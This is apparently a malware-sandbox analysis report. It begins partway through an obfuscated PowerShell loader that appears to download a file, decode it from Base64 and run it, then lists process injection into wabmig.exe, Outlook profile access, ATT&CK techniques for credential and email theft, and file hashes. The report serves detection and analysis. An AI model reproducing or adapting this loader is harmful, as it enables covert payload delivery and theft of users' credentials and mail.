SelvlSel bs AmfeeAsexus Ns fpBulgerRom.diA fejoBamburgrkerirefrit d ele spolrOasitiO,olunAf seg Larysvagab]Exce =R ann$OpthaMFrosco SolinSubfioTr dis.ngricDurskePar,gl PaknaS eysnGrummsNskes ');$Forlagsredaktrens=Klanens 'Omniu$ embeV uftaiAd.aneSygedlSki ssPaafyefigursSymme.StrygDBorgeooutfiw SkrpnBhootlTenoroPuffea Ant d S miFnonbuiHogvelPigwee gudm( mimi$MistnT Ennor bauxo evgu Ha ntIm uniCoerce rotor Med,1 Lymp8Me hj6Funam, Acco$ KorrPSmageyBruger FlucaLakrimSlaveiStenbdqui.z) Co,p ';$Pyramid=$Forebyggendes[0];Unslyness (Klanens 'Vespe$C ntiG Ripal lexiOLatinb slavA UnaaL oint:educaGFor,roOccipTDiscoePla p=Per n(MttentCatoneDi meS OrtyT Hard-Ans.uP OutrA ,illtPakprHMiscl origi$adultpBridoy ForhrGoldeaBr,ntmSejlfiRe.redLyssi)Spani ');while (!$Gote) {Unslyness (Klanens 'Frate$PintagDowablT icao Dek,bVulgaaC trolEmpir:BusseNObligemaryswSyd vlHippoiVigoun.nevoeKomposUrobi=Glemm$ Ka et Kirkr La,tuAnlgsePerse ') ;Unslyness $Forlagsredaktrens;Unslyness (Klanens 'ro.beS DagdtTappeaOver,rMet ytXenol-CruciS s.ejl DesoeMun eeKandip Alle No,le4Arrig ');Unslyness (Klanens 'Weine$Suppog FjerlMo.aloBonavbTaarnaHyst l ecen: hel G Warso Op.ttKittee mast=M,nuf(SdvanTSaccheR lats jeset madr- Res.PB,ykoa Strat BismhFinke Tand$IsuroP Aldey inger,argiaasylamReteaiBurisd Brug)Suppr ') ;Unslyness (Klanens 'Dispe$C okegCessalU appoNonetbMa,hraSi edlSkabe:ScryeTO jekeRetrolBade.e orsopHikkelagoraaLilacyRente=Antio$MekangAr iclPresaoHinnebP otoaSemiclHoved:D,sorSCalory leuknParabtSuperaChronkCere sSmigrmInd.baPart eSkipps dekas MoreiAndesgridestIn si+bygko+Tugte%unmu $ChoriP MetorUnfuroLderbcUdkrst Unici PrestNonatiBaidasBesna.Abidac G,oboFremtu Bantn Drift Bein ') ;$Troutier186=$Proctitis[$Teleplay];}$kamillo=333348;$Hoys=29133;Unslyness (Klanens 'Lempn$Vom,tgBreedlDamplo CondbMa riaVirksl Tjre:Skakks Reg g.eglsePall,rHrbare unltGlatnnPlougi lvlanBaandgKamenewidennRhesu Hiber=Unrea Sla GTran e TidetRydde- Pol CNoct oUdfrsnEv.ditFaksieS.uscnProgrtCoemp K lku$TautoPbegroyrhumbrNonreaRegiomNonseiInfradPseud ');Unslyness (Klanens ' Trag$ owargKuverl.omeroLotanbSammeaRejusl ,riv: fklaG Proct AktieFlawepSysteaIll.mg.ecrotSca reFrekvnSoven1Argum5Adven8 E sk Laita=Obli Natu[ BantS.ogstyBeligsTugget Undee MiscmSkraa.WitzcC.loddoKlemen C pevOp,rse M.larteg,ttBans ]Ine.f:Mu.li:EducaFMisadrSupraoKa dsmSurahBPussea Lovns ueinepree 6St in4Ga dhSSalattAbranr I dbiCompunS.rivg Bort(trlas$,lodgsT mpeg SacceDestrrFrisieRespotkel inruperiudmntnB dekgkomple urflnKlap )Uria ');Unslyness (Klanens ' Mimr$CockegVerifl Ba,uo B,ndbDrivgaLiguslKopio:Bone SvoldfkFurbieAk iew ismaePhenyd Tors Desig= Ort Irreg[Tu inStrickyPantosErgomtKazooe armem Befa.La,peT Csare Oss,xSalintepide.c ntaE ultin SkidcO tanoT bskd beriiHypoin JerngDropf].ense:praeg:L jevAIrrecSFise CSfor IDrnenIdr.km.ThorhG avvreRailrtFreskSberett DyderRegeliErsrenVouchgPreou( Picn$Patt GSpe mtPar meGer gpR.stia tersgarrest Chece Begrn ,adi1Micro5Skage8Qu me)Blide ');Unslyness (Klanens 'Pro y$Rem dgGaelilAflytoCheezbRetsmaTrolilKredi:MaalrKKillilroastoth,argObtuntTil,s=Skraa$OverpSHelvekNuance,uffewVengieNomosdOvers.NedslsCif.euKrakibevig s Inc.tV rlirForskiDeletnNedklgCha.q(Carla$Tele kSubnuaChampmCourtiDiktalNedl lMaskeom rra,zardm$ CentH ForvoSquawyNe,tesMbler)Sp cu ');Unslyness $Klogt;"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2584
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Trkisternes.Brk && echo t"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3060
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        Accesses Microsoft Outlook profiles
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:4664

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

1

T1555

Credentials from Web Browsers

1

T1555.003

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Email Collection

1

T1114

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i5z5ifwe.gcz.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-945322488-2060912225-3527527000-1000\0f5007522459c86e95ffcc62f32308f1_03d68389-5a68-4d9e-92ac-47b927e624dd

Filesize
46B

MD5
c07225d4e7d01d31042965f048728a0a

SHA1
69d70b340fd9f44c89adb9a2278df84faa9906b7

SHA256
8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

SHA512
23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-945322488-2060912225-3527527000-1000\0f5007522459c86e95ffcc62f32308f1_03d68389-5a68-4d9e-92ac-47b927e624dd

Filesize
46B

MD5
d898504a722bff1524134c6ab6a5eaa5

SHA1
e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

SHA256
878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

SHA512
26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

Download Submit
C:\Users\Admin\AppData\Roaming\Trkisternes.Brk

Filesize
471KB

MD5
27ee351b991f2fba2750c9b1a2836ac9

SHA1
cb562a39b754eee37113b546fee24bf6ea02b3fb

SHA256
89a1b6bbfb720a61871e8131a91926dee8f03b89ee0432079bba965433521fdb

SHA512
882eb7a44f25bb1895d23774e768c8570d04528102e49a824f43731e1cf5e529762434ce89ee837363e7a0c77601ce03b210860ac5c4aed1329b9f2816aa5b2f

Download Submit
memory/2584-40-0x0000000007EE0000-0x0000000008484000-memory.dmp

Filesize
5.6MB

Download
memory/2584-36-0x00000000072B0000-0x000000000792A000-memory.dmp

Filesize
6.5MB

Download
memory/2584-42-0x0000000008490000-0x000000000AC46000-memory.dmp

Filesize
39.7MB

Download
memory/2584-38-0x0000000006DB0000-0x0000000006E46000-memory.dmp

Filesize
600KB

Download
memory/2584-18-0x0000000002200000-0x0000000002236000-memory.dmp

Filesize
216KB

Download
memory/2584-19-0x0000000004E40000-0x0000000005468000-memory.dmp

Filesize
6.2MB

Download
memory/2584-20-0x0000000004C50000-0x0000000004C72000-memory.dmp

Filesize
136KB

Download
memory/2584-21-0x0000000004D00000-0x0000000004D66000-memory.dmp

Filesize
408KB

Download
memory/2584-22-0x0000000005470000-0x00000000054D6000-memory.dmp

Filesize
408KB

Download
memory/2584-28-0x00000000054E0000-0x0000000005834000-memory.dmp

Filesize
3.3MB

Download
memory/2584-33-0x0000000005B20000-0x0000000005B3E000-memory.dmp

Filesize
120KB

Download
memory/2584-34-0x0000000005BB0000-0x0000000005BFC000-memory.dmp

Filesize
304KB

Download
memory/2584-39-0x0000000006D40000-0x0000000006D62000-memory.dmp

Filesize
136KB

Download
memory/2584-37-0x0000000006C60000-0x0000000006C7A000-memory.dmp

Filesize
104KB

Download
memory/2936-15-0x00007FFC5CE13000-0x00007FFC5CE15000-memory.dmp

Filesize
8KB

Download
memory/2936-35-0x00007FFC5CE10000-0x00007FFC5D8D1000-memory.dmp

Filesize
10.8MB

Download
memory/2936-17-0x00007FFC5CE10000-0x00007FFC5D8D1000-memory.dmp

Filesize
10.8MB

Download
memory/2936-0-0x00007FFC5CE13000-0x00007FFC5CE15000-memory.dmp

Filesize
8KB

Download
memory/2936-12-0x00007FFC5CE10000-0x00007FFC5D8D1000-memory.dmp

Filesize
10.8MB

Download
memory/2936-16-0x00007FFC5CE10000-0x00007FFC5D8D1000-memory.dmp

Filesize
10.8MB

Download
memory/2936-43-0x00007FFC5CE10000-0x00007FFC5D8D1000-memory.dmp

Filesize
10.8MB

Download
memory/2936-61-0x00007FFC5CE10000-0x00007FFC5D8D1000-memory.dmp

Filesize
10.8MB

Download
memory/2936-11-0x00007FFC5CE10000-0x00007FFC5D8D1000-memory.dmp

Filesize
10.8MB

Download
memory/2936-10-0x0000015553BC0000-0x0000015553BE2000-memory.dmp

Filesize
136KB

Download
memory/4664-44-0x0000000001270000-0x0000000003A26000-memory.dmp

Filesize
39.7MB

Download
memory/4664-58-0x0000000001270000-0x0000000003A26000-memory.dmp

Filesize
39.7MB

Download

Analysis

Sharing